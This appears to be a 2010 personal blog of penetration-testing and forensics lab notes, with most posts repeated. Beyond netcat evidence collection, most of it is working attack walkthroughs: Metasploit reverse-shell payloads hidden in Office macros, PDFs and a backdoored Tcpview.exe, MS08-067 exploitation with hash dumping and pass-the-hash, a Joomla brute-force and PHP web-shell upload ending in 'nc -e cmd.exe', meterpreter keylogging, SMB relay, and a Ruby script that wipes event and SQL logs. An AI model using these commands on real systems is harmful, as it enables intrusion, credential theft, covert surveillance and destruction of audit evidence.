Dear All,
As of today. My personal blog has been moved to http://flexi-learn.blogspot.com
New posts will be updated soonest possible.
Monday, July 26, 2010
Thursday, June 24, 2010
Covert Analysis II (Forensics)
On LON-WEB1, open the Event Viewer mmc snap-in, select System Event then select Save Logfile As, save the system event with another name:
Example: C:\Backup\SysEvent-Backup.evt
from LON-WEB1, send the SysEvent-Backup.evt file to CHFI-XP2 machine:
D:\Forensics\Netcat>
nc -v 131.107.1.254 99 < C:\Backup\SysEvent-Backup.evt
from CHFI-XP2 machine, receive the file:
C:\Tools\Netcat>
nc -v -L -p 99 -w 60 > E:\Evidence\SysEvent-Backup.evt
To analyze:
On CHFI-XP2, open Event Viewer and load the file to view the events.
Example: C:\Backup\SysEvent-Backup.evt
from LON-WEB1, send the SysEvent-Backup.evt file to CHFI-XP2 machine:
D:\Forensics\Netcat>
nc -v 131.107.1.254 99 < C:\Backup\SysEvent-Backup.evt
from CHFI-XP2 machine, receive the file:
C:\Tools\Netcat>
nc -v -L -p 99 -w 60 > E:\Evidence\SysEvent-Backup.evt
To analyze:
On CHFI-XP2, open Event Viewer and load the file to view the events.
Overt Analysis (Forensics)
Use mmc on the CHFI-XP2 machine and connect to the evidence machine (LON-WEB1).
Launch the mmc with runas:
C:\>runas /user:LON-WEB1\administrator "mmc"
Once mmc has been launch, connect to the evidence machine.
Link:
Forensics Acquisition Utility (FAU)
http://gmgsystemsinc.com/fau/
Launch the mmc with runas:
C:\>runas /user:LON-WEB1\administrator "mmc"
Once mmc has been launch, connect to the evidence machine.
Link:
Forensics Acquisition Utility (FAU)
http://gmgsystemsinc.com/fau/
Covert Analysis I (Forensics)
On CHFI-XP2, launch Netcat in Listening Mode:
C:\Tools\Netcat>nc -v -L -p 99 >> E:\Evidence\MyEvidence.txt
On LON-WEB1, launch Netcat in Client Mode:
D:\Forensics\Netcat>date /t | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>time /t | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>ipconfig /all | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>netstat -an | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>nbtstat -n | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>arp -a | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>route print | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>tasklist | nc 131.107.1.254 99 -w10
Display registry values:
D:\Forensics\Netcat>reg query hklm\software\microsoft\windows\currentversion\run | nc 131.107.1.254 99 -w10
If you need to launch Netcat from different directory,
access it by using this command:
D:\Forensics\>cd Sysinternalssuite
D:\Forensics\Sysintenalssuite>pslist | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysintenalssuite>psloggedon | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysintenalssuite>psloglist | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysintenalssuite>psservice | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysintenalssuite>psfile | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysintenalssuite>pipelist | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysintenalssuite>listdlls | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysintenalssuite>procfeatures | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
MyEvidence.txt is the file which will store the evidence collection.
C:\Tools\Netcat>nc -v -L -p 99 >> E:\Evidence\MyEvidence.txt
On LON-WEB1, launch Netcat in Client Mode:
D:\Forensics\Netcat>date /t | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>time /t | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>ipconfig /all | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>netstat -an | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>nbtstat -n | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>arp -a | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>route print | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>tasklist | nc 131.107.1.254 99 -w10
Display registry values:
D:\Forensics\Netcat>reg query hklm\software\microsoft\windows\currentversion\run | nc 131.107.1.254 99 -w10
If you need to launch Netcat from different directory,
access it by using this command:
D:\Forensics\>cd Sysinternalssuite
D:\Forensics\Sysintenalssuite>pslist | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysintenalssuite>psloggedon | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysintenalssuite>psloglist | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysintenalssuite>psservice | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysintenalssuite>psfile | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysintenalssuite>pipelist | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysintenalssuite>listdlls | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysintenalssuite>procfeatures | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
MyEvidence.txt is the file which will store the evidence collection.
Tuesday, May 18, 2010
Client-side Attack by Using Evil MS-Office Apps (Excel or Word)
Step 1: Create your own payload
cd /pentest/exploits/framework3
./msfpayload windows/meterpreter/reverse_tcp LHOST=131.107.1.252 LPORT=443 X > /tmp/payload.exe
Step 2: Convert your newly created payload to VBA (Visual Basic for Application) script
cd /pentest/exploits/framework3/tools
./exe2vba.rb /tmp/payload.exe /tmp/payload.vba
Step 3: Copy and Paste the contents of the payload to your evil file
Open your evil file (Excel or Word). Select: Tools > Macro > Visual Basic Editor, paste the contents of your payload.vba, then save the file.
Step 5: Wait for the reverse connection from the client
msf > use exploit/multi/handler
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set LHOST 131.107.1.252
msf > set LPORT 443
msf > exploit
Friday, May 14, 2010
ECSA/LPT @ ECDC Photos
Guys, download our photos from here:
http://www.4shared.com/account/photo/pefTq93p/DSCN1014.html
http://www.4shared.com/account/photo/_AmTe_3S/DSCN1015.html
http://www.4shared.com/account/photo/pefTq93p/DSCN1014.html
http://www.4shared.com/account/photo/_AmTe_3S/DSCN1015.html
Thursday, May 13, 2010
Autopwn = Ninja Script!
msf > db_driver sqlite3
msf > db_create pentest
msf > db_nmap -sS -p135,139,445 192.168.1.200
msf > db_hosts
msf > db_services
msf > db_autopwn -t -p -e -r
msf > db_create pentest
msf > db_nmap -sS -p135,139,445 192.168.1.200
msf > db_hosts
msf > db_services
msf > db_autopwn -t -p -e -r
SMB Pass the Hash
Step 1:
Get the hashes from the target machine (eq. LON-DC1 = 192.168.1.200)
msf > use windows/smb/ms08_067_netapi
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set RHOST 192.168.1.200
msf > set LHOST 192.168.1.252
msf > set LPORT 443
msf > set TARGET 7
msf > exploit
meterpreter > run hashdump
Administrator:500:921988ba001dc8e14a3b108f3fa6cb6d:e19ccf75ee54e06b06a5907af13cef42:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Step 2:
Copy the hash then pass the hash by using psexec
msf > use windows/smb/psexec
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set RHOST 192.168.1.110
msf > set LHOST 192.168.1.252
msf > set LPORT 6666
msf > set SMBUser Administrator
msf > set SMBPass 921988ba001dc8e14a3b108f3fa6cb6d:e19ccf75ee54e06b06a5907af13cef42
msf > exploit
Get the hashes from the target machine (eq. LON-DC1 = 192.168.1.200)
msf > use windows/smb/ms08_067_netapi
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set RHOST 192.168.1.200
msf > set LHOST 192.168.1.252
msf > set LPORT 443
msf > set TARGET 7
msf > exploit
meterpreter > run hashdump
Administrator:500:921988ba001dc8e14a3b108f3fa6cb6d:e19ccf75ee54e06b06a5907af13cef42:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Step 2:
Copy the hash then pass the hash by using psexec
msf > use windows/smb/psexec
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set RHOST 192.168.1.110
msf > set LHOST 192.168.1.252
msf > set LPORT 6666
msf > set SMBUser Administrator
msf > set SMBPass 921988ba001dc8e14a3b108f3fa6cb6d:e19ccf75ee54e06b06a5907af13cef42
msf > exploit
Client-side Attack by Using Evil PDF
Step 1: Create your own payload
Step 2: Create an evil pdf
msf > use windows/fileformat/adobe_pdf_embedded_exe
msf > set PAYLOAD windows/metepreter/reverse_tcp
msf > set EXENAME /tmp/payload.exe
msf > set FILENAME /tmp/BestComputerGuide.pdf
msf > set INFILENAME /tmp/Report.pdf
msf > set OUTPUTPATH /tmp/
msf > exploit
Note:
EXENAME is your payload/shellcode
FILENAME is your evil pdf file
INFILENAME is your original pdf file
OUTPUTPATH is your output directory
Result: /tmp/BestComputerGuide.pdf
Step 3: Send the evil pdf file to your client
Step 4: Wait for the reverse connection from the client
msf > use exploit/multi/handler
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set LHOST 131.107.1.252
msf > set LPORT 443
msf > exploit
cd /pentest/exploits/framework3
./msfpayload windows/meterpreter/reverse_tcp LHOST=131.107.1.252 LPORT=443 X > /tmp/payload.exe
Step 2: Create an evil pdf
msf > use windows/fileformat/adobe_pdf_embedded_exe
msf > set PAYLOAD windows/metepreter/reverse_tcp
msf > set EXENAME /tmp/payload.exe
msf > set FILENAME /tmp/BestComputerGuide.pdf
msf > set INFILENAME /tmp/Report.pdf
msf > set OUTPUTPATH /tmp/
msf > exploit
Note:
EXENAME is your payload/shellcode
FILENAME is your evil pdf file
INFILENAME is your original pdf file
OUTPUTPATH is your output directory
Result: /tmp/BestComputerGuide.pdf
Step 3: Send the evil pdf file to your client
Step 4: Wait for the reverse connection from the client
msf > use exploit/multi/handler
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set LHOST 131.107.1.252
msf > set LPORT 443
msf > exploit
Wednesday, May 12, 2010
Fabrikam Website Pen-Test
Step 1:
Find the Admin password (Password Guessing, Brute Force or Dictionary attack).
Tools: hydra or brutus
Example:
hydra -v -L login.txt -P pass.txt -m /administrator/index.php www.fabrikam.com http-get
hydra -v -L login.txt -P pass.txt -m /administrator/index.php www.fabrikam.com http-get-form
Step 2:
Goto http://www.fabrikam.com/administrator/ and login with the Username and Password you've got from Step 1.
Download Joomla Extension (eq. GalleryXML = Photo Gallery) from:
http://extensions.joomla.org/extensions/photos-a-images/photo-gallery/12504
Save it to any folder you want (eq. Z:\Tools\PHP Shell folder).
Step 3:
Extract com_galleryxml.zip to Z:\Tools\PHP Shell folder.
Step 4:
Edit the galleryxml.xml control file and put dshell.php (PHP Shell) in the admin section.
Step 5:
Copy dshell.php to com_galleryxml/admin folder.
Step 6:
Archive or zip the contents of com_galleryxml folder into com_galleryxml.zip.
Step 7:
Use the "Extension Manager -> Upload & Install", browse and upload com_galleryxml.zip file.
Step 8:
Launch the PHP Shell from:
http://www.fabrikam.com/administrator/components/com_galleryxml/dshell.php
Step 9:
By using dshell.php functionality, upload nc.exe to the remote server.
Step 10:
From the Pen-Tester machine, type:
nc -v -l -p443
From dshell.php page, execute Netcat by typing:
nc -v 131.107.1.222 443 -d -e cmd.exe
If the connection was successful, you should get the command prompt on your machine.
References:
http://docs.joomla.org/How_you_reset_an_administrator_password%3F
http://forum.joomla.org/viewtopic.php?t=10985
http://community.contractwebdevelopment.com/joomla-how-reset-super-admin-password
http://www.dart-creations.com/joomla/joomla-tips-and-tricks/25-forgot-your-super-administrator-password.html
Find the Admin password (Password Guessing, Brute Force or Dictionary attack).
Tools: hydra or brutus
Example:
hydra -v -L login.txt -P pass.txt -m /administrator/index.php www.fabrikam.com http-get
hydra -v -L login.txt -P pass.txt -m /administrator/index.php www.fabrikam.com http-get-form
Step 2:
Goto http://www.fabrikam.com/administrator/ and login with the Username and Password you've got from Step 1.
Download Joomla Extension (eq. GalleryXML = Photo Gallery) from:
http://extensions.joomla.org/extensions/photos-a-images/photo-gallery/12504
Save it to any folder you want (eq. Z:\Tools\PHP Shell folder).
Step 3:
Extract com_galleryxml.zip to Z:\Tools\PHP Shell folder.
Step 4:
Edit the galleryxml.xml control file and put dshell.php (PHP Shell) in the admin section.
Step 5:
Copy dshell.php to com_galleryxml/admin folder.
Step 6:
Archive or zip the contents of com_galleryxml folder into com_galleryxml.zip.
Step 7:
Use the "Extension Manager -> Upload & Install", browse and upload com_galleryxml.zip file.
Step 8:
Launch the PHP Shell from:
http://www.fabrikam.com/administrator/components/com_galleryxml/dshell.php
Step 9:
By using dshell.php functionality, upload nc.exe to the remote server.
Step 10:
From the Pen-Tester machine, type:
nc -v -l -p443
From dshell.php page, execute Netcat by typing:
nc -v 131.107.1.222 443 -d -e cmd.exe
If the connection was successful, you should get the command prompt on your machine.
References:
http://docs.joomla.org/How_you_reset_an_administrator_password%3F
http://forum.joomla.org/viewtopic.php?t=10985
http://community.contractwebdevelopment.com/joomla-how-reset-super-admin-password
http://www.dart-creations.com/joomla/joomla-tips-and-tricks/25-forgot-your-super-administrator-password.html
Tuesday, May 11, 2010
My Sample Report for VA & PT
Here is my sample report which can be used for Vulnerability Analysis and Pen-Test.
Download Sample Report (VA-PT)
Download Sample Report (VA-PT)
Monday, May 10, 2010
Download External Meterpreter Scripts and Tool
ifconfig eth1 up
ifconfig eth1 192.168.1.x/24
route add default gw 192.168.1.x
cd /pentest/exploits/framework3/scripts/meterpreter
wget http://www.darkoperator.com/meterpreter/disable_audit.rb
wget http://www.room362.com/scripts-and-programs/metasploit/deploymsf.rb
cd /pentest/exploits/framework3/plugins
wget http://www.room362.com/scripts-and-programs/metasploit/mini-3.3-dev.exe
ifconfig eth1 192.168.1.x/24
route add default gw 192.168.1.x
cd /pentest/exploits/framework3/scripts/meterpreter
wget http://www.darkoperator.com/meterpreter/disable_audit.rb
wget http://www.room362.com/scripts-and-programs/metasploit/deploymsf.rb
cd /pentest/exploits/framework3/plugins
wget http://www.room362.com/scripts-and-programs/metasploit/mini-3.3-dev.exe
Testing IDS with Encoded Payload
Step 1: On TEST-BT4, create an Encoded EXE Payload
./msfpayload windows/shell_reverse_tcp LHOST=131.107.1.252 LPORT=443 R | ./msfencode -e x86/shikata_ga_nai -t exe -o /tmp/payload.exe
Step 2: Copy the newly created Encoded EXE Payload to DEN-WEB2
Step 3: On TEST-BT4, launch Netcat in Listening Mode
nc -v -l -p 443
or
cd /pentest/exploits/framework3
./msfconsole
msf > use multi/handler
msf > set PAYLOAD windows/shell_reverse_tcp
msf > set LHOST 131.107.1.252
msf > set LPORT 443
msf > exploit
Step 4: ON DEN-WEB2, launch the Encoded EXE Payload (payload.exe)
You should see, a reverse connection from DEN-WEB2 to TEST-BT4
Advanced Topic: Embedding Legitimate Program with Encoded Payload (Reverse TCP Shell Backdoor)
Legitimate: Tcpview.exe
Backdoor: Tcpview2.exe
./msfpayload windows/shell/reverse_tcp LHOST=131.107.1.252 LPORT=443 R | ./msfencode -t exe -x /tmp/Tcpview.exe -o /tmp/Tcpview2.exe
./msfpayload windows/shell_reverse_tcp LHOST=131.107.1.252 LPORT=443 R | ./msfencode -e x86/shikata_ga_nai -t exe -o /tmp/payload.exe
Step 2: Copy the newly created Encoded EXE Payload to DEN-WEB2
Step 3: On TEST-BT4, launch Netcat in Listening Mode
nc -v -l -p 443
or
cd /pentest/exploits/framework3
./msfconsole
msf > use multi/handler
msf > set PAYLOAD windows/shell_reverse_tcp
msf > set LHOST 131.107.1.252
msf > set LPORT 443
msf > exploit
Step 4: ON DEN-WEB2, launch the Encoded EXE Payload (payload.exe)
You should see, a reverse connection from DEN-WEB2 to TEST-BT4
Advanced Topic: Embedding Legitimate Program with Encoded Payload (Reverse TCP Shell Backdoor)
Legitimate: Tcpview.exe
Backdoor: Tcpview2.exe
./msfpayload windows/shell/reverse_tcp LHOST=131.107.1.252 LPORT=443 R | ./msfencode -t exe -x /tmp/Tcpview.exe -o /tmp/Tcpview2.exe
Testing IDS with Sample Attacks
Port Scanning
Attacks:
nmap -sS 131.107.1.254
nmap -sU 131.107.1.254
nmap -sT 131.107.1.254
Snort: SNMP AgentX/tcp request -or- SNMP request tcp
Category: Attempted Information Leak
IIS Unicode Directory Traversal Exploit Test
Attack:
http://131.107.1.254/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
or
nc -v 131.107.1.254 80
GET http://131.107.1.254/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
Category: unclassified
Apache Directory Access Test
Attack:
http://131.107.1.254/.htaccess
or
nc -v 131.107.1.254 80
GET http://131.107.1.254/.htaccess
press Enter
Category: attempted-recon
Attack:
http://131.107.1.254/robots.txt
or
nc -v 131.107.1.254 80
GET http://131.107.1.254/robots.txt
Category: web-application-activity
Ping Flood (Simple DoS Attack)
Attack:
ping -l 65000 131.107.1.254 (Windows)
or
ping -s 65000 131.107.1.254 (Linux)
Snort: ICMP L3retriever Ping
Category: attempted-recon
IDS Evasion Attack
Attack:
nmap -sS -PN -p80,443 -T1 131.107.1.254
Attacks:
nmap -sS 131.107.1.254
nmap -sU 131.107.1.254
nmap -sT 131.107.1.254
Snort: SNMP AgentX/tcp request -or- SNMP request tcp
Category: Attempted Information Leak
IIS Unicode Directory Traversal Exploit Test
Attack:
http://131.107.1.254/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
or
nc -v 131.107.1.254 80
GET http://131.107.1.254/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
Category: unclassified
Apache Directory Access Test
Attack:
http://131.107.1.254/.htaccess
or
nc -v 131.107.1.254 80
GET http://131.107.1.254/.htaccess
press Enter
Category: attempted-recon
Attack:
http://131.107.1.254/robots.txt
or
nc -v 131.107.1.254 80
GET http://131.107.1.254/robots.txt
Category: web-application-activity
Ping Flood (Simple DoS Attack)
Attack:
ping -l 65000 131.107.1.254 (Windows)
or
ping -s 65000 131.107.1.254 (Linux)
Snort: ICMP L3retriever Ping
Category: attempted-recon
IDS Evasion Attack
Attack:
nmap -sS -PN -p80,443 -T1 131.107.1.254
Installing Nessus on BackTrack and Ubuntu Desktop
Step 1: Download from http://www.nessus.org and Install Nessus
Filename: Nessus-4.2.2-ubuntu810_i386.deb
Save in /tmp/ directory
Installing Nessus with Debian Package Manager
cd /tmp
dpkg -i Nessus-4.2.2-ubuntu810_i386.deb
Step 2: Add Nessus User
cd /opt/nessus/sbin
./nessus-adduser
Step 3: Register Nessus and Download All Plugins
Visit http://www.nessus.org/plugins/?view=homefeed
Register with your email address.
Open your email and get the registration/serial number.
cd /opt/nessus/bin
./nessus-fetch --register serial_number
./nessus-fetch --register 2B92-597B-2D44-C737-2309
Step 4: Launch Nessus Server and Apply All Plugins
cd /opt/nessus/sbin
./nessus-service
or
/etc/init.d/nessusd start
Step 5: Launch Nessus Client
https://localhost:8834/
Step 6: Update Plugins
cd /opt/nessus/sbin
./nessus-update-plugins
Nessus Plugins located at: /opt/nessus/lib/nessus/plugins
Filename: Nessus-4.2.2-ubuntu810_i386.deb
Save in /tmp/ directory
Installing Nessus with Debian Package Manager
cd /tmp
dpkg -i Nessus-4.2.2-ubuntu810_i386.deb
Step 2: Add Nessus User
cd /opt/nessus/sbin
./nessus-adduser
Step 3: Register Nessus and Download All Plugins
Visit http://www.nessus.org/plugins/?view=homefeed
Register with your email address.
Open your email and get the registration/serial number.
cd /opt/nessus/bin
./nessus-fetch --register serial_number
./nessus-fetch --register 2B92-597B-2D44-C737-2309
cd /opt/nessus/sbin
./nessus-service
or
/etc/init.d/nessusd start
Step 5: Launch Nessus Client
https://localhost:8834/
Step 6: Update Plugins
cd /opt/nessus/sbin
./nessus-update-plugins
Nessus Plugins located at: /opt/nessus/lib/nessus/plugins
Friday, April 9, 2010
SQL Log Clear
Example of an MSSQL Log Clear (mssqlclear.rb)
#MSSQL Log Clear
def list_exec(session,cmdlst)
print_status("Running Command List ...")
r=''
session.response_timeout=120
cmdlst.each do |cmd|
begin
print_status "running command #{cmd}"
r = session.sys.process.execute("cmd.exe /c #{cmd}", nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
print_status("#{d}")
end
r.channel.close
r.close
rescue ::Exception => e
print_error("Error Running Command #{cmd}: #{e.class} #{e}")
end
end
end
commands = ['Net STOP "SQL Server (SQLEXPRESS)" ',
'del "%SystemDrive%\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\LOG\ERRORLOG.*"',
'del "%SystemDrive%\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\LOG\log*.trc"',
'Net START "SQL Server (SQLEXPRESS)"']
def clrevtlgs(session)
evtlogs = [
'security',
'system',
'application',
'directory service',
'dns server',
'file replication service'
]
print_status("Clearing Event Logs, this will leave and event 517")
begin
evtlogs.each do |evl|
print_status("Clearing the #{evl} Event Log")
log = session.sys.eventlog.open(evl)
log.clear
end
print_status("All Event Logs have been cleared")
rescue ::Exception => e
print_status("Error clearing Event Log: #{e.class} #{e}")
end
end
list_exec(client,commands)
clrevtlgs(client)
#MSSQL Log Clear
def list_exec(session,cmdlst)
print_status("Running Command List ...")
r=''
session.response_timeout=120
cmdlst.each do |cmd|
begin
print_status "running command #{cmd}"
r = session.sys.process.execute("cmd.exe /c #{cmd}", nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
print_status("#{d}")
end
r.channel.close
r.close
rescue ::Exception => e
print_error("Error Running Command #{cmd}: #{e.class} #{e}")
end
end
end
commands = ['Net STOP "SQL Server (SQLEXPRESS)" ',
'del "%SystemDrive%\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\LOG\ERRORLOG.*"',
'del "%SystemDrive%\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\LOG\log*.trc"',
'Net START "SQL Server (SQLEXPRESS)"']
def clrevtlgs(session)
evtlogs = [
'security',
'system',
'application',
'directory service',
'dns server',
'file replication service'
]
print_status("Clearing Event Logs, this will leave and event 517")
begin
evtlogs.each do |evl|
print_status("Clearing the #{evl} Event Log")
log = session.sys.eventlog.open(evl)
log.clear
end
print_status("All Event Logs have been cleared")
rescue ::Exception => e
print_status("Error clearing Event Log: #{e.class} #{e}")
end
end
list_exec(client,commands)
clrevtlgs(client)
Tuesday, April 6, 2010
Tuesday, March 9, 2010
IE Aurora (CVE-2010-0249) with Metasploit 3.x
cd /pentest/exploits/msf3
./msfconsole
msf > use windows/browser/ie_aurora
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set SRVHOST 131.107.1.252
msf > set SRVPORT 80
msf > set LHOST 131.107.1.252
msf > set LPORT 443
msf > set URIPATH /you_win.html
msf > exploit
./msfconsole
msf > use windows/browser/ie_aurora
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set SRVHOST 131.107.1.252
msf > set SRVPORT 80
msf > set LHOST 131.107.1.252
msf > set LPORT 443
msf > set URIPATH /you_win.html
msf > exploit
Tutorial: Keystore Logger with Meterpreter
Target: 131.107.1.50 (Windows XP SP2 English)
Yours: 131.107.1.522 (BackTrack 3 with Metasploit 3.x)
Step 1: Exploit with Windows Animated Cursor Vulnerability (CVE-2007-0028)
cd /pentest/exploits/msf3
./msfconsole
msf > use windows/browser/ani_loadimage_chunksize
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set SRVHOST 131.107.1.252
msf > set LHOST 131.107.1.252
msf > set SRVPORT 80
msf > set LPORT 443
msf > set URIPATH /you_win.html
msf > exploit
Step 2: Connect to the attacker's machine via IE 6
http://131.107.1.252/you_win.html
Note:
Use the DNS poisoning or cache poisoning to change the IP address to a domain name.
Example:
www.abc.com 131.107.1.252
http://www.abc.com/you_win.html
Once you've got the connection, type:
msf > sessions -l
msf > sessions -i 1
Step 3: Migrate the processes (Explorer.exe or Winlogon.exe)
Note:
- Migrate the Explorer.exe if you want to capture the Desktop keystrokes.
- Migrate the Winlogon.exe if you want to capture the Windows Logon keystrokes.
List all processes...
meterpreter > ps
Migrate Explorer.exe or Winlogon.exe (use the PID number)
meterpreter > migrate
Start the Keystroke Logger...
meterpreter > keyscan_start
Display the captured keystrokes...
meterpreter > keyscan_dump
Stop the Keystroke Logger...
meterpreter > keyscan_stop
Yours: 131.107.1.522 (BackTrack 3 with Metasploit 3.x)
Step 1: Exploit with Windows Animated Cursor Vulnerability (CVE-2007-0028)
cd /pentest/exploits/msf3
./msfconsole
msf > use windows/browser/ani_loadimage_chunksize
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set SRVHOST 131.107.1.252
msf > set LHOST 131.107.1.252
msf > set SRVPORT 80
msf > set LPORT 443
msf > set URIPATH /you_win.html
msf > exploit
Step 2: Connect to the attacker's machine via IE 6
http://131.107.1.252/you_win.html
Note:
Use the DNS poisoning or cache poisoning to change the IP address to a domain name.
Example:
www.abc.com 131.107.1.252
http://www.abc.com/you_win.html
Once you've got the connection, type:
msf > sessions -l
msf > sessions -i 1
Step 3: Migrate the processes (Explorer.exe or Winlogon.exe)
Note:
- Migrate the Explorer.exe if you want to capture the Desktop keystrokes.
- Migrate the Winlogon.exe if you want to capture the Windows Logon keystrokes.
List all processes...
meterpreter > ps
Migrate Explorer.exe or Winlogon.exe (use the PID number)
meterpreter > migrate
Start the Keystroke Logger...
meterpreter > keyscan_start
Display the captured keystrokes...
meterpreter > keyscan_dump
Stop the Keystroke Logger...
meterpreter > keyscan_stop
Tutorial: NTLM Hijacking with SMB Relay Exploit
Target: 192.168.1.50 (Windows XP SP2 English)
Yours: 192.168.1.252 (BackTrack 3 with Metasploit 3.x)
Step 1: Prepare the SMB Exploit
cd /pentest/exploits/msf3
./msfconsole
msf > use windows/smb/smb_relay
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set SRVHOST 192.168.1.252
msf > set LHOST 192.168.1.252
msf > set LPORT 5555
msf > exploit
Step 2: Connect to the FAKE shared folder from the remote machine
\\192.168.1.252\shared\xxx.jpg
shared\xxx.jpg is a fake link
Step 3: Interact with the open session
Check the active sessions...
msf > sessions -l
Interact with active session# 1
msf > sessions -i 1
Command shell...
meterpreter > shell
Yours: 192.168.1.252 (BackTrack 3 with Metasploit 3.x)
Step 1: Prepare the SMB Exploit
cd /pentest/exploits/msf3
./msfconsole
msf > use windows/smb/smb_relay
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set SRVHOST 192.168.1.252
msf > set LHOST 192.168.1.252
msf > set LPORT 5555
msf > exploit
Step 2: Connect to the FAKE shared folder from the remote machine
\\192.168.1.252\shared\xxx.jpg
shared\xxx.jpg is a fake link
Step 3: Interact with the open session
Check the active sessions...
msf > sessions -l
Interact with active session# 1
msf > sessions -i 1
Command shell...
meterpreter > shell
Tutorial: Exploiting Windows XP SP2 with MS08-067 Vulnerability
Target: 192.168.1.50 (Windows XP SP2 English)
Yours: 192.168.1.252 (BackTrack 3 with Metasploit 3.x)
Step 1: Scan for SMB Vulnerability (netapi = MS08-067)
nmap -sS --script=smb-check-vulns 192.168.1.50
Step 2: Check the SMB Version (O/S, SP level & Language)
cd /pentest/exploits/msf3
./msfconsole
msf > use scanner/smb/smb_version
msf > set RHOSTS 192.168.1.50
msf > run
Step 3: Exploit with MS08-067 module
msf > use windows/smb/ms08_067_netapi
msf > set PAYLOAD windows/shell/bind_tcp
msf > set RHOST 192.168.1.50
msf > show targets
msf > set TARGET 3 (depends on step# 2)
msf > run
meterpreter > sysinfo
Computer: LON-CL1
OS : Windows XP (Build 2600, Service Pack 2).
Arch : x86
Language: en_US
Yours: 192.168.1.252 (BackTrack 3 with Metasploit 3.x)
Step 1: Scan for SMB Vulnerability (netapi = MS08-067)
nmap -sS --script=smb-check-vulns 192.168.1.50
Step 2: Check the SMB Version (O/S, SP level & Language)
cd /pentest/exploits/msf3
./msfconsole
msf > use scanner/smb/smb_version
msf > set RHOSTS 192.168.1.50
msf > run
Step 3: Exploit with MS08-067 module
msf > use windows/smb/ms08_067_netapi
msf > set PAYLOAD windows/shell/bind_tcp
msf > set RHOST 192.168.1.50
msf > show targets
msf > set TARGET 3 (depends on step# 2)
msf > run
meterpreter > sysinfo
Computer: LON-CL1
OS : Windows XP (Build 2600, Service Pack 2).
Arch : x86
Language: en_US
Tutorial: Enumeration via SMB/CIFS
Enumerate Users
nmap -sS --script=smb-enum-users ip_address
Enumerate Shared Folders
nmap -sS --script=smb-enum-shares ip_address
Enumeration with Metasploit Auxiliary module
cd /pentest/exploits/msf3
./msfconsole
msf > scanner/smb/smb_enumusers
msf > set RHOSTS ip_address
msf > run
nmap -sS --script=smb-enum-users ip_address
Enumerate Shared Folders
nmap -sS --script=smb-enum-shares ip_address
Enumeration with Metasploit Auxiliary module
cd /pentest/exploits/msf3
./msfconsole
msf > scanner/smb/smb_enumusers
msf > set RHOSTS ip_address
msf > run
Monday, March 8, 2010
Tutorial: Metasploit Framework 3.x Basics
cd /pentest/exploits/msf3
./msfconsole
msf > search iis
ISAPI Printer Overflow Exploit
msf > info windows/iis/ms01_023_printer
msf > use windows/iis/ms01_023_printer
msf > show payloads
Bind TCP payload
msf > set PAYLOAD windows/shell/bind_tcp
msf > show options
Set the target IP address
msf > set RHOST 131.107.1.101
msf > exploit
./msfconsole
msf > search iis
ISAPI Printer Overflow Exploit
msf > info windows/iis/ms01_023_printer
msf > use windows/iis/ms01_023_printer
msf > show payloads
Bind TCP payload
msf > set PAYLOAD windows/shell/bind_tcp
msf > show options
Set the target IP address
msf > set RHOST 131.107.1.101
msf > exploit
Tutorial: IIS Unicode Directory Traversal
